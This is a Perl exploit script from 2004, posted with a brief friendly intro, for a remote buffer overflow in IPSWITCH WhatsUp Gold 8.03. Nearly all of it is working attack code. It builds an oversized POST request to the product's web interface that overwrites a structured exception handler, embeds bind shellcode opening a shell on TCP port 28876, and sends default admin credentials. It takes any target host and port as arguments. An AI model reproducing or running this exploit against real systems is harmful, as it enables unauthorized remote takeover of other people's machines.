A nice exploit :) Hope you like it. #!/usr/bin/perl # [LoWNOISE] NotmuchG.pl v.1.5 # ================================================ # IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit # ================================================ # # Exploit by ET LoWNOISE Colombia # et(at)cyberspace.org # Oct/2004 # # Tested on WIN2K SP4 # # The exploit takes control by overwriting the pointer of a Structured Exception Handler, # installed by WhatsUP and points to a routine that handles exceptions. # (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC) # # The overflow string has to be around 4080 in length to generate an exception that can # be manipulated by changing the SEH pointer (ret [815]). # # # Bug Discovered by # iDEFENSE Security Advisory 08.25.04 # http://www.idefense.com/application/poi/display?type=vulnerabilities # # Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n, Ritt3r,Mav, f4lc0n.. use strict; use IO::Socket::INET; usage() unless (@ARGV == 2); my $host = shift(@ARGV); my $port = shift(@ARGV); # Bind shellcode port 28876 (HDM, metasploit.org) my $shellcode = "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52". "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1". "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a". "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01". "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b". "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32". "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff". "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe". "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50". "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff". "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89". "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff". "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a". "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb". "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0". "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44". "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b". "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff". "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff". "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0". "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to the host.\n"; $socket->autoflush(1); print $socket "POST /_maincfgret.cgi HTTP/1.0\r\n"; print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, application/vnd.citrix.AdvGWClient-2_2, */*\r\n"; print $socket "Referer: http://127.0.0.1/NotifyAction.asp?action=AddType&instance=Beeper&end=end\r\n"; print $socket "Accept-Language: en-us\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\n"; print $socket "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; T312461; .NET CLR 1.1.4322)\r\n"; print $socket "Host: 127.0.0.1\r\nContent-Length: "; my $cmd ="page=notify&origname=&action=return&type=Beeper&instancename="; #[-------815-------------] [ret] [-------------4080---------] #[A.....811...A][jmp] [ret] [nops][shc][E.......E ] $cmd .= "A"x811; #815 -4 $cmd .= "\xeb\x06\x90\x90"; #jumper jmp to shellcode #$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll $cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll #$cmd .= "LOWNOISE"; #garbage :D $cmd .= "\x90"x2080; $cmd .= $shellcode; $cmd .= "E"x(2000-length($shellcode)); #mas basura $cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end"; print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"; print $socket $cmd."\r\n"; close($socket); exit(0); sub usage { print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n"; print "===================================================\n"; print "\nUsage: NotmuchG.pl [host] [port]\n"; print "[host] Target host\n[port] WhatsUp webserver port\n\n"; print "\n Shell on tcp port 28876.\n\n"; print "ET LoWNOISE 2004\n"; exit(1); } #The EnD.